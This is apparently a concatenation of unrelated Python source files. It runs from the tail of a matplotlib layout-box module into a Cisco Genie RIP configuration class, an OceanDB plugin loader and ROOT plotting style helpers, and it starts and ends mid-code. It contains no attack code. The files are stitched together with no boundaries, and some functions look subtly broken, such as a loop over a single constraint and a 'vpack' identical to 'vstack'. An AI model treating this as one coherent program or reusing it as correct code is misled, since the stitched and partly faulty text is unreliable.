self.subplot = subplot self.top = Variable(sn + 'top') self.bottom = Variable(sn + 'bottom') self.left = Variable(sn + 'left') self.right = Variable(sn + 'right') self.width = Variable(sn + 'width') self.height = Variable(sn + 'height') self.h_center = Variable(sn + 'h_center') self.v_center = Variable(sn + 'v_center') self.min_width = Variable(sn + 'min_width') self.min_height = Variable(sn + 'min_height') self.pref_width = Variable(sn + 'pref_width') self.pref_height = Variable(sn + 'pref_height') # margins are only used for axes-position layout boxes. maybe should # be a separate subclass: self.left_margin = Variable(sn + 'left_margin') self.right_margin = Variable(sn + 'right_margin') self.bottom_margin = Variable(sn + 'bottom_margin') self.top_margin = Variable(sn + 'top_margin') # mins self.left_margin_min = Variable(sn + 'left_margin_min') self.right_margin_min = Variable(sn + 'right_margin_min') self.bottom_margin_min = Variable(sn + 'bottom_margin_min') self.top_margin_min = Variable(sn + 'top_margin_min') right, top = upper_right left, bottom = lower_left self.tightheight = tightheight self.tightwidth = tightwidth self.add_constraints() self.children = [] self.subplotspec = None if self.pos: self.constrain_margins() self.h_pad = h_pad self.w_pad = w_pad def constrain_margins(self): """ Only do this for pos. This sets a variable distance margin between the position of the axes and the outer edge of the axes. Margins are variable because they change with the figure size. Margin minimums are set to make room for axes decorations. However, the margins can be larger if we are mathicng the position size to other axes. """ sol = self.solver # left if not sol.hasEditVariable(self.left_margin_min): sol.addEditVariable(self.left_margin_min, 'strong') sol.suggestValue(self.left_margin_min, 0.0001) c = (self.left_margin == self.left - self.parent.left) self.solver.addConstraint(c | 'required') c = (self.left_margin >= self.left_margin_min) self.solver.addConstraint(c | 'strong') # right if not sol.hasEditVariable(self.right_margin_min): sol.addEditVariable(self.right_margin_min, 'strong') sol.suggestValue(self.right_margin_min, 0.0001) c = (self.right_margin == self.parent.right - self.right) self.solver.addConstraint(c | 'required') c = (self.right_margin >= self.right_margin_min) self.solver.addConstraint(c | 'required') # bottom if not sol.hasEditVariable(self.bottom_margin_min): sol.addEditVariable(self.bottom_margin_min, 'strong') sol.suggestValue(self.bottom_margin_min, 0.0001) c = (self.bottom_margin == self.bottom - self.parent.bottom) self.solver.addConstraint(c | 'required') c = (self.bottom_margin >= self.bottom_margin_min) self.solver.addConstraint(c | 'required') # top if not sol.hasEditVariable(self.top_margin_min): sol.addEditVariable(self.top_margin_min, 'strong') sol.suggestValue(self.top_margin_min, 0.0001) c = (self.top_margin == self.parent.top - self.top) self.solver.addConstraint(c | 'required') c = (self.top_margin >= self.top_margin_min) self.solver.addConstraint(c | 'required') def add_child(self, child): self.children += [child] def remove_child(self, child): try: self.children.remove(child) except ValueError: _log.info("Tried to remove child that doesn't belong to parent") def add_constraints(self): sol = self.solver # never let width and height go negative. 
for i in [self.min_width, self.min_height]: sol.addEditVariable(i, 1e9) sol.suggestValue(i, 0.0) # define relation ships between things thing width and right and left self.hard_constraints() # self.soft_constraints() if self.parent: self.parent_constrain() # sol.updateVariables() def parent_constrain(self): parent = self.parent hc = [self.left >= parent.left, self.bottom >= parent.bottom, self.top <= parent.top, self.right <= parent.right] for c in hc: self.solver.addConstraint(c | 'required') def hard_constraints(self): hc = [self.width == self.right - self.left, self.height == self.top - self.bottom, self.h_center == (self.left + self.right) * 0.5, self.v_center == (self.top + self.bottom) * 0.5, self.width >= self.min_width, self.height >= self.min_height] for c in hc: self.solver.addConstraint(c | 'required') def soft_constraints(self): sol = self.solver if self.tightwidth: suggest = 0. else: suggest = 20. c = (self.pref_width == suggest) for i in c: sol.addConstraint(i | 'required') if self.tightheight: suggest = 0. else: suggest = 20. c = (self.pref_height == suggest) for i in c: sol.addConstraint(i | 'required') c = [(self.width >= suggest), (self.height >= suggest)] for i in c: sol.addConstraint(i | 150000) def set_parent(self, parent): """Replace the parent of this with the new parent.""" self.parent = parent self.parent_constrain() def constrain_geometry(self, left, bottom, right, top, strength='strong'): hc = [self.left == left, self.right == right, self.bottom == bottom, self.top == top] for c in hc: self.solver.addConstraint(c | strength) # self.solver.updateVariables() def constrain_same(self, other, strength='strong'): """ Make the layoutbox have same position as other layoutbox """ hc = [self.left == other.left, self.right == other.right, self.bottom == other.bottom, self.top == other.top] for c in hc: self.solver.addConstraint(c | strength) def constrain_left_margin(self, margin, strength='strong'): c = (self.left == self.parent.left + margin) self.solver.addConstraint(c | strength) def edit_left_margin_min(self, margin): self.solver.suggestValue(self.left_margin_min, margin) def constrain_right_margin(self, margin, strength='strong'): c = (self.right == self.parent.right - margin) self.solver.addConstraint(c | strength) def edit_right_margin_min(self, margin): self.solver.suggestValue(self.right_margin_min, margin) def constrain_bottom_margin(self, margin, strength='strong'): c = (self.bottom == self.parent.bottom + margin) self.solver.addConstraint(c | strength) def edit_bottom_margin_min(self, margin): self.solver.suggestValue(self.bottom_margin_min, margin) def constrain_top_margin(self, margin, strength='strong'): c = (self.top == self.parent.top - margin) self.solver.addConstraint(c | strength) def edit_top_margin_min(self, margin): self.solver.suggestValue(self.top_margin_min, margin) def get_rect(self): return (self.left.value(), self.bottom.value(), self.width.value(), self.height.value()) def update_variables(self): """ Update *all* the variables that are part of the solver this LayoutBox is created with. """ self.solver.updateVariables() def edit_height(self, height, strength='strong'): """ Set the height of the layout box. This is done as an editable variable so that the value can change due to resizing. """ sol = self.solver for i in [self.height]: if not sol.hasEditVariable(i): sol.addEditVariable(i, strength) sol.suggestValue(self.height, height) def constrain_height(self, height, strength='strong'): """ Constrain the height of the layout box. 
height is either a float or a layoutbox.height. """ c = (self.height == height) self.solver.addConstraint(c | strength) def constrain_height_min(self, height, strength='strong'): c = (self.height >= height) self.solver.addConstraint(c | strength) def edit_width(self, width, strength='strong'): sol = self.solver for i in [self.width]: if not sol.hasEditVariable(i): sol.addEditVariable(i, strength) sol.suggestValue(self.width, width) def constrain_width(self, width, strength='strong'): """ Constrain the width of the layout box. *width* is either a float or a layoutbox.width. """ c = (self.width == width) self.solver.addConstraint(c | strength) def constrain_width_min(self, width, strength='strong'): c = (self.width >= width) self.solver.addConstraint(c | strength) def constrain_left(self, left, strength='strong'): c = (self.left == left) self.solver.addConstraint(c | strength) def constrain_bottom(self, bottom, strength='strong'): c = (self.bottom == bottom) self.solver.addConstraint(c | strength) def constrain_right(self, right, strength='strong'): c = (self.right == right) self.solver.addConstraint(c | strength) def constrain_top(self, top, strength='strong'): c = (self.top == top) self.solver.addConstraint(c | strength) def _is_subplotspec_layoutbox(self): """ Helper to check if this layoutbox is the layoutbox of a subplotspec. """ name = self.name.split('.')[-1] return name[:2] == 'ss' def _is_gridspec_layoutbox(self): """ Helper to check if this layoutbox is the layoutbox of a gridspec. """ name = self.name.split('.')[-1] return name[:8] == 'gridspec' def find_child_subplots(self): """ Find children of this layout box that are subplots. We want to line poss up, and this is an easy way to find them all. """ if self.subplot: subplots = [self] else: subplots = [] for child in self.children: subplots += child.find_child_subplots() return subplots def layout_from_subplotspec(self, subspec, name='', artist=None, pos=False): """ Make a layout box from a subplotspec. The layout box is constrained to be a fraction of the width/height of the parent, and be a fraction of the parent width/height from the left/bottom of the parent. Therefore the parent can move around and the layout for the subplot spec should move with it. The parent is *usually* the gridspec that made the subplotspec.?? """ lb = LayoutBox(parent=self, name=name, artist=artist, pos=pos) gs = subspec.get_gridspec() nrows, ncols = gs.get_geometry() parent = self.parent # OK, now, we want to set the position of this subplotspec # based on its subplotspec parameters. The new gridspec will inherit # from gridspec. prob should be new method in gridspec left = 0.0 right = 1.0 bottom = 0.0 top = 1.0 totWidth = right-left totHeight = top-bottom hspace = 0. wspace = 0. 
# calculate accumulated heights of columns cellH = totHeight / (nrows + hspace * (nrows - 1)) sepH = hspace * cellH if gs._row_height_ratios is not None: netHeight = cellH * nrows tr = sum(gs._row_height_ratios) cellHeights = [netHeight * r / tr for r in gs._row_height_ratios] else: cellHeights = [cellH] * nrows sepHeights = [0] + ([sepH] * (nrows - 1)) cellHs = np.cumsum(np.column_stack([sepHeights, cellHeights]).flat) # calculate accumulated widths of rows cellW = totWidth / (ncols + wspace * (ncols - 1)) sepW = wspace * cellW if gs._col_width_ratios is not None: netWidth = cellW * ncols tr = sum(gs._col_width_ratios) cellWidths = [netWidth * r / tr for r in gs._col_width_ratios] else: cellWidths = [cellW] * ncols sepWidths = [0] + ([sepW] * (ncols - 1)) cellWs = np.cumsum(np.column_stack([sepWidths, cellWidths]).flat) figTops = [top - cellHs[2 * rowNum] for rowNum in range(nrows)] figBottoms = [top - cellHs[2 * rowNum + 1] for rowNum in range(nrows)] figLefts = [left + cellWs[2 * colNum] for colNum in range(ncols)] figRights = [left + cellWs[2 * colNum + 1] for colNum in range(ncols)] rowNum1, colNum1 = divmod(subspec.num1, ncols) rowNum2, colNum2 = divmod(subspec.num2, ncols) figBottom = min(figBottoms[rowNum1], figBottoms[rowNum2]) figTop = max(figTops[rowNum1], figTops[rowNum2]) figLeft = min(figLefts[colNum1], figLefts[colNum2]) figRight = max(figRights[colNum1], figRights[colNum2]) # These are numbers relative to (0, 0, 1, 1). Need to constrain # relative to parent. width = figRight - figLeft height = figTop - figBottom parent = self.parent cs = [self.left == parent.left + parent.width * figLeft, self.bottom == parent.bottom + parent.height * figBottom, self.width == parent.width * width, self.height == parent.height * height] for c in cs: self.solver.addConstraint(c | 'required') return lb def __repr__(self): return (f'LayoutBox: {self.name:25s}, ' f'(left: {self.left.value():1.3f}) ' f'(bot: {self.bottom.value():1.3f}) ' f'(right: {self.right.value():1.3f}) ' f'(top: {self.top.value():1.3f})') # Utility functions that act on layoutboxes... def hstack(boxes, padding=0, strength='strong'): """ Stack LayoutBox instances from left to right. *padding* is in figure-relative units. 
""" for i in range(1, len(boxes)): c = (boxes[i-1].right + padding <= boxes[i].left) boxes[i].solver.addConstraint(c | strength) def hpack(boxes, padding=0, strength='strong'): """Stack LayoutBox instances from left to right.""" for i in range(1, len(boxes)): c = (boxes[i-1].right + padding == boxes[i].left) boxes[i].solver.addConstraint(c | strength) def vstack(boxes, padding=0, strength='strong'): """Stack LayoutBox instances from top to bottom.""" for i in range(1, len(boxes)): c = (boxes[i-1].bottom - padding >= boxes[i].top) boxes[i].solver.addConstraint(c | strength) def vpack(boxes, padding=0, strength='strong'): """Stack LayoutBox instances from top to bottom.""" for i in range(1, len(boxes)): c = (boxes[i-1].bottom - padding >= boxes[i].top) boxes[i].solver.addConstraint(c | strength) def match_heights(boxes, height_ratios=None, strength='medium'): """Stack LayoutBox instances from top to bottom.""" if height_ratios is None: height_ratios = np.ones(len(boxes)) for i in range(1, len(boxes)): c = (boxes[i-1].height == boxes[i].height*height_ratios[i-1]/height_ratios[i]) boxes[i].solver.addConstraint(c | strength) def match_widths(boxes, width_ratios=None, strength='medium'): """Stack LayoutBox instances from top to bottom.""" if width_ratios is None: width_ratios = np.ones(len(boxes)) for i in range(1, len(boxes)): c = (boxes[i-1].width == boxes[i].width*width_ratios[i-1]/width_ratios[i]) boxes[i].solver.addConstraint(c | strength) def vstackeq(boxes, padding=0, height_ratios=None): vstack(boxes, padding=padding) match_heights(boxes, height_ratios=height_ratios) def hstackeq(boxes, padding=0, width_ratios=None): hstack(boxes, padding=padding) match_widths(boxes, width_ratios=width_ratios) def align(boxes, attr, strength='strong'): cons = [] for box in boxes[1:]: cons = (getattr(boxes[0], attr) == getattr(box, attr)) boxes[0].solver.addConstraint(cons | strength) def match_top_margins(boxes, levels=1): box0 = boxes[0] top0 = box0 for n in range(levels): top0 = top0.parent for box in boxes[1:]: topb = box for n in range(levels): topb = topb.parent c = (box0.top-top0.top == box.top-topb.top) box0.solver.addConstraint(c | 'strong') def match_bottom_margins(boxes, levels=1): box0 = boxes[0] top0 = box0 for n in range(levels): top0 = top0.parent for box in boxes[1:]: topb = box for n in range(levels): topb = topb.parent c = (box0.bottom-top0.bottom == box.bottom-topb.bottom) box0.solver.addConstraint(c | 'strong') def match_left_margins(boxes, levels=1): box0 = boxes[0] top0 = box0 for n in range(levels): top0 = top0.parent for box in boxes[1:]: topb = box for n in range(levels): topb = topb.parent c = (box0.left-top0.left == box.left-topb.left) box0.solver.addConstraint(c | 'strong') def match_right_margins(boxes, levels=1): box0 = boxes[0] top0 = box0 for n in range(levels): top0 = top0.parent for box in boxes[1:]: topb = box for n in range(levels): topb = topb.parent c = (box0.right-top0.right == box.right-topb.right) box0.solver.addConstraint(c | 'strong') def match_width_margins(boxes, levels=1): match_left_margins(boxes, levels=levels) match_right_margins(boxes, levels=levels) def match_height_margins(boxes, levels=1): match_top_margins(boxes, levels=levels) match_bottom_margins(boxes, levels=levels) def match_margins(boxes, levels=1): match_width_margins(boxes, levels=levels) match_height_margins(boxes, levels=levels) _layoutboxobjnum = itertools.count() def seq_id(): """Generate a short sequential id for layoutbox objects.""" return '%06d' % next(_layoutboxobjnum) def 
print_children(lb): """Print the children of the layoutbox.""" print(lb) for child in lb.children: print_children(child) def nonetree(lb): """ Make all elements in this tree None, signalling not to do any more layout. """ if lb is not None: if lb.parent is None: # Clear the solver. Hopefully this garbage collects. lb.solver.reset() nonechildren(lb) else: nonetree(lb.parent) def nonechildren(lb): for child in lb.children: nonechildren(child) lb.artist._layoutbox = None lb = None def print_tree(lb): """Print the tree of layoutboxes.""" if lb.parent is None: print('LayoutBox Tree\n') print('==============\n') print_children(lb) print('\n') else: print_tree(lb.parent) def plot_children(fig, box, level=0, printit=True): """Simple plotting to show where boxes are.""" import matplotlib import matplotlib.pyplot as plt if isinstance(fig, matplotlib.figure.Figure): ax = fig.add_axes([0., 0., 1., 1.]) ax.set_facecolor([1., 1., 1., 0.7]) ax.set_alpha(0.3) fig.draw(fig.canvas.get_renderer()) else: ax = fig import matplotlib.patches as patches colors = plt.rcParams["axes.prop_cycle"].by_key()["color"] if printit: print("Level:", level) for child in box.children: if printit: print(child) ax.add_patch( patches.Rectangle( (child.left.value(), child.bottom.value()), # (x, y) child.width.value(), # width child.height.value(), # height fc='none', alpha=0.8, ec=colors[level] ) ) if level > 0: name = child.name.split('.')[-1] if level % 2 == 0: ax.text(child.left.value(), child.bottom.value(), name, size=12-level, color=colors[level]) else: ax.text(child.right.value(), child.top.value(), name, ha='right', va='top', size=12-level, color=colors[level]) plot_children(ax, child, level=level+1, printit=printit) __all__ = ( 'Rip', ) from genie.utils.cisco_collections import typedset from genie.decorator import managedattribute from genie.conf.base import DeviceFeature, LinkFeature, InterfaceFeature import genie.conf.base.attributes from genie.conf.base.attributes import SubAttributes, SubAttributesDict, AttributesHelper from genie.libs.conf.base import Routing from genie.libs.conf.address_family import AddressFamily, AddressFamilySubAttributes from genie.libs.conf.vrf import Vrf, VrfSubAttributes class Rip(Routing, DeviceFeature, LinkFeature, InterfaceFeature): """Rip class `Rip` inherits `Feature' class. The class defines all rip related information and functionalities. Args: Returns: a `Rip` object """ # When adding a rip instance to a link, all the interfaces in this link # needs to be told about the rip object. 
# this syntax means : all interfaces register_name = {} register_name['interfaces'] = 'rip' instance_id = managedattribute( name='instance_id', read_only=True, # mandatory doc='RIP Instance ID') shutdown = managedattribute( name='shutdown', default=None, type=(None, managedattribute.test_istype(bool))) address_families = managedattribute( name='address_families', finit=typedset(AddressFamily, {AddressFamily.ipv4_unicast}).copy, type=typedset(AddressFamily)._from_iterable) # AddressFamilyAttributes distance = managedattribute( name='distance', default=None, type=(None, managedattribute.test_istype(int))) maximum_paths = managedattribute( name='maximum_paths', default=None, type=(None, managedattribute.test_istype(int))) default_metric = managedattribute( name='default_metric', default=None, type=(None, managedattribute.test_istype(int))) redistribute_lisp_rmap = managedattribute( name='redistribute_lisp_rmap', default=None, type=(None, managedattribute.test_istype(str))) redistribute_direct_rmap = managedattribute( name='redistribute_direct_rmap', default=None, type=(None, managedattribute.test_istype(str))) redistribute_static_rmap = managedattribute( name='redistribute_static_rmap', default=None, type=(None, managedattribute.test_istype(str))) @property def vrfs(self): return \ self.force_vrfs | \ {intf.vrf for intf in self.interfaces} force_vrfs = managedattribute( name='force_vrfs', read_only=True, finit=set, gettype=frozenset) # XXXJST TODO force_vrfs needs to also be accessible per-device. Being read_only, that can't happen def add_force_vrf(self, vrf): assert vrf is None or isinstance(vrf, Vrf) self.force_vrfs # init! self._force_vrfs.add(vrf) def remove_force_vrf(self, vrf): assert vrf is None or isinstance(vrf, Vrf) self.force_vrfs # init! self._force_vrfs.remove(vrf) class DeviceAttributes(genie.conf.base.attributes.DeviceSubAttributes): """DeviceAttributes class `DeviceAttributes` contains attributes and functionalities that are specific for a device. Args: kwargs (`dict`) : assign attributes to this object while creating it. Returns: a `DeviceAttributes` object """ enabled_feature = managedattribute( name='enabled_feature', default=False, type=managedattribute.test_istype(bool), doc='''Argument to control 'feature rip' CLI''') address_families = managedattribute( name='address_families', type=typedset(AddressFamily)._from_iterable) @address_families.defaulter def address_families(self): return frozenset(self.parent.address_families) @property def vrfs(self): return \ self.force_vrfs | \ {intf.vrf for intf in self.interfaces} def __init__(self, **kwargs): super().__init__(**kwargs) class VrfAttributes(VrfSubAttributes): """ VrfAttributes class `VrfAttributes` inherits from `SubAttributes' class. It contains all vrf related attributes and functionalities. Class contains some powers to access its parent attributes. Args: kwargs (`dict`) : gives the user ability to assign some or all address family attributes while creating the object. """ def __init__(self, **kwargs): super().__init__(**kwargs) address_families = managedattribute( name='address_families', type=typedset(AddressFamily)._from_iterable) @address_families.defaulter def address_families(self): return frozenset(self.parent.address_families) class AddressFamilyAttributes(AddressFamilySubAttributes): """ AddressFamilyAttributes class `AddressFamilyAttributes` inherits from `SubAttributes' class. It contains all address family related attributes and functionalities. Class contains some powers to access its parent attributes. 
Args: kwargs (`dict`) : gives the user ability to assign some or all address family attributes while creating the object. Class variables: allowed_keys (`List`): list of all allowed 'keys' the object can access. """ allowed_keys = ( AddressFamily.ipv4_unicast, AddressFamily.ipv6_unicast, ) address_family_attr = managedattribute( name='address_family_attr', read_only=True, doc=AddressFamilyAttributes.__doc__) @address_family_attr.initter def address_family_attr(self): return SubAttributesDict(self.AddressFamilyAttributes, parent=self) vrf_attr = managedattribute( name='vrf_attr', read_only=True, doc=VrfAttributes.__doc__) @vrf_attr.initter def vrf_attr(self): return SubAttributesDict(self.VrfAttributes, parent=self) device_attr = managedattribute( name='device_attr', read_only=True, doc=DeviceAttributes.__doc__) @device_attr.initter def device_attr(self): return SubAttributesDict(self.DeviceAttributes, parent=self) def __init__(self, instance_id, **kwargs): '''Rip Base class''' self._instance_id = int(instance_id) super().__init__(**kwargs) def build_config(self, devices=None, apply=True, attributes=None, **kwargs): """method to build the configuration based on attributes Api to build the configuration of an Rip object. This configuration depends of the configurable attributes of this object. If Apply is set to True, then it will apply on the device(s) If it is set to False, then it will return a dictionary. If any kwargs are passed, then the configuration that is built will use those kwargs given, and not the object attributes. This is useful for modifying the configuration, without re-applying everything. Args: apply (`bool`): If True will apply the configuration on the device and if False will return the configuration in a dictionary kwargs (`dict`): If there is kwargs, then it will use those attributes to configure the feature. Otherwise will use the object attributes Return: `str` """ attributes = AttributesHelper(self, attributes) # Get devices if none were passed if devices is None: devices = self.devices # For each device, loop over device_attr cfgs = {} for key, sub, attributes2 in attributes.mapping_items('device_attr', keys=devices): cfgs[key] = sub.build_config(apply=False, attributes=attributes2, **kwargs) if apply: self.testbed.config_on_devices(cfgs, fail_invalid=True) else: # Return configuration return cfgs def build_unconfig(self, devices=None, apply=True, attributes=None, **kwargs): """method to build the unconfiguration based on attributes Api to build the unconfiguration of an Rip object. This configuration depends of the configurable attributes of this object. If Apply is set to True, then it will apply on the device(s) If it is set to False, then it will return a dictionary. If any kwargs are passed, then the configuration that is built will use those kwargs given, and not the object attributes. This is useful for modifying the configuration, without re-applying everything. Args: apply (`bool`): If True will apply the configuration on the device and if False will return the configuration in a dictionary kwargs (`dict`): If there is kwargs, then it will use those attributes to configure the feature. 
        Return:
            `dict` of per-device configurations (when apply is False)
        """
        attributes = AttributesHelper(self, attributes)

        # Get devices if none were passed
        if devices is None:
            devices = self.devices

        # For each device, loop over device_attr
        cfgs = {}
        for key, sub, attributes2 in attributes.mapping_items(
                'device_attr', keys=devices):
            cfgs[key] = sub.build_unconfig(apply=False,
                                           attributes=attributes2,
                                           **kwargs)

        if apply:
            self.testbed.config_on_devices(cfgs, fail_invalid=True)
        else:
            # Return configuration
            return cfgs


import configparser
import argparse
import importlib.util

from oceandb_plugin_system.constants import CONFIG_OPTION
from oceandb_plugin_system.exceptions import ConfigError


def parse_args():
    """Parse command line arguments given to the agent."""
    parser = argparse.ArgumentParser(description="OceanDB Plugin System")
    parser.add_argument('--config', metavar='path', required=False,
                        help='path to the oceandb_plugin_system.ini file')
    try:
        args = parser.parse_args()
        return args
    except:
        pass


def parse_config(file_path='../config/oceandb_plugin_system.ini'):
    """Load the configuration file given as parameter."""
    config_parser = configparser.ConfigParser()
    config_parser.read(file_path)
    plugin_config = {}
    options = config_parser.options(CONFIG_OPTION)
    for option in options:
        try:
            plugin_config[option] = config_parser.get(CONFIG_OPTION, option)
            if plugin_config[option] == -1:
                print("skip: %s" % option)
        except:
            print("exception on %s!" % option)
            plugin_config[option] = None
    return plugin_config


def start_plugin():
    """Initialize the Ocean plugin."""
    try:
        args = parse_args()
        if args is not None:
            if args.config is not None:
                config = parse_config(args.config)
            else:
                config = parse_config()
        else:
            config = parse_config()
    except:
        raise ConfigError("You should provide a valid config.")
    plugin_instance = load_plugin(config)
    return plugin_instance(config)


def load_plugin(config):
    module = config['module']
    module_path = "../plugins/%s/plugin.py" % module
    spec = importlib.util.spec_from_file_location("plugin.py", module_path)
    foo = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(foo)
    return foo.Plugin


def print_help():
    """Print the default help on stdout."""
    pass


import os
import sys
import tutils as tu
import ROOT
import draw_utils as du
from array import array

gDebug = False

# needs a fix: the dbgu import below depends on where the module is...
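# Usage sketch for the OceanDB plugin loader defined above -- a minimal,
# hypothetical example (the ini path is a placeholder, not part of the
# module). It assumes the ini file contains the section named by
# CONFIG_OPTION with at least a 'module' option naming a directory under
# ../plugins/:
#
#     config = parse_config('/path/to/oceandb_plugin_system.ini')
#     plugin_cls = load_plugin(config)   # the plugin's Plugin class
#     plugin = plugin_cls(config)        # what start_plugin() returns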
from dbgu import debug_utils as dbgu import pcanvas import pyutils from eval_string import get_value def check_andor_make_output_dir(sname, isfilename=False): sdir = sname if isfilename: sdir = os.path.dirname(sname) if len(sdir) == 0: sdir = './' if os.path.isdir(sdir) is False: try: os.makedirs(sdir) except: return False return os.path.isdir(sdir) class debugable(object): def __init__(self): pass def debug(self, msg): global gDebug if gDebug is True: print('[d]', msg) class style_iterator(debugable): good_colors = [-1, 2, 1, 9, 6, 32, 49, 40, 8, 43, 46, 39, 28, 38, 21, 22, 23, 2, 1, 9, 6, 32, 49, 40, 8, 43, 46, 39, 28, 38, 21, 22, 23] good_markers = [-1, 20, 24, 21, 25, 33, 27, 28, 34, 29, 30, 20, 24, 21, 25, 27, 33, 28, 34, 29, 30, 20, 24, 21, 25, 33, 27, 28, 34, 29, 30, 20, 24, 21, 25, 27, 33, 28, 34, 29, 30] # good_lines = [ -1, 1, 2, 3, 5, 8, 6, 7, 4, 9, 10] good_lines = [-1, 1, 2, 3, 5, 7, 9, 6, 8, 4, 10, 1, 2, 3, 5, 7, 9, 6, 8, 4, 10, 1, 2, 3, 5, 7, 9, 6, 8, 4, 10, 1, 2, 3, 5, 7, 9, 6, 8, 4, 10] def __init__(self, reset_idx=0): self.reset_index = reset_idx self.reset() def reset_to_index(self, idx): self.reset_index = idx def reset(self): self.color_idx = self.reset_index self.line_idx = self.reset_index self.marker_idx = self.reset_index self.line_width = 2 def colorize(self, force_color=None): self.color_idx = 0 for o in self.l: icol = force_color if icol is None: icol = self.next_color() o.SetLineColor(icol) def lineize(self, force_line=None): self.line_idx = 0 for o in self.l: imark = force_line if imark is None: imark = self.next_line() o.SetLineStyle(imark) o.SetLineColor(1) o.SetLineWidth(self.line_width) self.debug('::lineize set line style {} for {}'.format(imark, o.GetName())) def markerize(self, force_marker=None): self.marker_idx = 0 scale = 1. for o in self.l: imark = self.next_marker() o.SetMarkerStyle(imark) if imark >= 27: scale = 1.3 o.SetMarkerSize(self.marker_size * scale) o.SetMarkerColor(o.GetLineColor()) def next_color(self): self.color_idx = self.color_idx + 1 if self.color_idx >= len(self.good_colors): self.color_idx = 0 return self.good_colors[self.color_idx] def next_marker(self): self.marker_idx = self.marker_idx + 1 if self.marker_idx >= len(self.good_markers): self.marker_idx = 0 return self.good_markers[self.marker_idx] def next_line(self): self.line_idx = self.line_idx + 1 if self.line_idx >= len(self.good_lines): self.line_idx = 0 return self.good_lines[self.line_idx] def __next__(self): self.next_color() self.next_marker() self.next_line() class draw_option(debugable): def __init__(self, stro=''): self.s = stro.lower() self.strip = self.s self.debug('::draw_option with {}'.format(self.s)) self.lstyle = self.get_style_from_opt('l') self.pstyle = self.get_style_from_opt('p') self.fstyle = self.get_style_from_opt('f') self.kolor = self.get_style_from_opt('k') self.alpha = self.get_style_from_opt('a') # alpha for fill self.lwidth = self.get_style_from_opt('w') self.shift = self.get_number_from_opt('s') if self.lwidth == 0: self.lwidth = 2 self.psize = self.get_style_from_opt('m') if self.psize == 0: self.psize = 0.9 else: self.psize = self.psize / 100. 
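        # Note on the option mini-language parsed by get_style_from_opt()
        # and get_number_from_opt() below: numeric tokens are
        #   '+l<n>' line style, '+p<n>' marker style, '+f<n>' fill style,
        #   '+k<n>' color index, '+a<n>' fill alpha in percent,
        #   '+w<n>' line width, '+m<n>' marker size (n/100), '+s<x>' x-shift;
        # plain words include 'hist'/'l'/'c' (line), 'p' (markers),
        # 'serror' (error band), 'noleg', 'hidden', 'bw', 'smooth', 'rect',
        # 'over', 'timex'/'timey', and '-k'/'-l' to reuse the previous
        # object's color / line style.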
self.use_line = self.check_use_line() self.use_line_legend = self.check_use_line_legend() self.bw = self.check_black_white() self.use_marker = self.check_use_marker() self.is_error = self.has(['serror'], strip=True) self.no_legend = self.has(['noleg'], strip=True) self.hidden = self.has(['hidden'], strip=True) self.rectangle = self.has(['rect'], strip=True) self.overlay = self.has(['over'], strip=True) #ignore 2D canvas splits self.last_kolor = self.has(['-k']) self.last_line = self.has(['-l']) self.smooth = self.has(['smooth'], strip=True) self.is_time_x = self.has(['timex'], strip=True) self.is_time_y = self.has(['timey'], strip=True) def stripped(self): return self.strip def check_black_white(self): return self.has(['bw']) def check_use_line(self): marks = ['hist', 'l', 'c'] return self.has(marks) def check_use_line_legend(self): marks = ['-'] return not self.has(marks) def check_use_marker(self): marks = ['p'] return self.has(marks) def legend_option(self): ret = '' if self.no_legend: return ret if self.use_marker: ret = ret + ' p ' if self.use_line or self.use_line_legend: ret = ret + ' l ' if self.is_error: ret = ret + ' f ' if self.fstyle != 0: ret = ret + ' f ' return ret def has(self, lst, strip=False): ret = False for e in lst: # for s in self.s.split(' '): for s in self.strip.split(' '): if e == s[:len(e)]: ret = True if strip is True: self.strip = self.strip.replace(e, '') return ret def get_style_from_opt(self, what): # what can be l or p or f ts = self.s.split('+') # self.debug('::get_style_from_opt ' + str(ts)) val = 0 for t in ts: tt = t.split(' ')[0] if len(tt) <= 0: continue if what in tt[0]: try: nt = tt[1:] val = int(nt) except: pass self.debug('::get_style_from_opt on {} returning {}'.format(what, val)) self.strip = self.strip.replace('+{}{}'.format(what, str(val)), '') return val def get_number_from_opt(self, what): ts = self.s.split('+' + what) if len(ts) < 2: return 0.0 snum = ts[1].split(' ') fnum = 0.0 try: fnum = get_value(snum[0], float, 0.0) except: fnum = 0.0 self.strip = self.strip.replace('+{}{}'.format(what, str(snum[0])), '') return fnum def random_string(prefix='', ns=30): import random import string lst = [random.choice(string.ascii_letters + string.digits) for n in range(ns)] return str(prefix) + ''.join(lst) class draw_object(debugable): def __init__(self, robj, name=None, new_title=None, dopts=''): self.name = name if self.name is None: self.name = '{}_{}'.format(robj.GetName(), random_string()) self.obj = robj.Clone(self.name) if self.obj.InheritsFrom('TH1'): self.obj.SetDirectory(0) if new_title: self.user_title = new_title if self.obj.InheritsFrom('TF1'): pass else: self.obj.SetTitle(new_title) if self.obj.GetTitle() == '': if self.obj.InheritsFrom('TF1'): pass else: self.obj.SetTitle(self.name) self.user_title = self.name self.dopt = draw_option(dopts) self.is_first = False self.exec = [] def draw(self, extra_opt=''): sdopt = self.dopt.stripped() + ' ' + extra_opt if 'draw!' 
in extra_opt.lower(): sdopt = extra_opt if self.is_first is True: if self.obj.InheritsFrom('TGraph'): sdopt = sdopt + ' A' self.debug('doption=' + sdopt) if self.dopt.is_time_x: self.obj.GetXaxis().SetTimeDisplay(1) if self.dopt.is_time_y: self.obj.GetYaxis().SetTimeDisplay(1) self.obj.Draw(sdopt) else: self.obj.Draw(sdopt + ' same') class dlist(debugable): enable_eps = False def __init__(self, name='hl'): self.name = name self.title = name self.l = [] self.style = style_iterator() self.maxy = 1e6 # was 1 self.miny = -1e6 # was 0 self.maxz = None # was 1 self.minz = None # was 0 self.max_adjusted = False self.axis_title_offset = [5, 5, 5] # [1.4, 1.4, 1.4] self.axis_title_size = [12, 12, 12] # [0.05, 0.05, 0.05] self.axis_label_size = [12, 12, 12] # for font 42 [0.04, 0.04, 0.04] self.axis_label_offset = [0.02, 0.02, 0.02] self.font = 42 self.pattern = None self.tcanvas = None self.minx = None self.maxx = None self.pad_name = None # pad where last drawn self.pad = None # pad where last drawn self.set_font(42) self.force_legend = False # by default no legends on 2D plots def set_font(self, fn=42, scale=1.): self.font = fn if self.font == 42: self.axis_title_offset = [1.40, 1.45, 1.0] # y offset was 1.40 then 1.45 self.axis_title_size = [0.05 * scale, 0.05 * scale, 0.05 * scale] self.axis_label_size = [0.04 * scale, 0.04 * scale, 0.04 * scale] self.axis_label_offset = [0.02, 0.02, 0.02] if self.font == 43: self.axis_title_offset = [ 3, 3, 2] #[1.4, 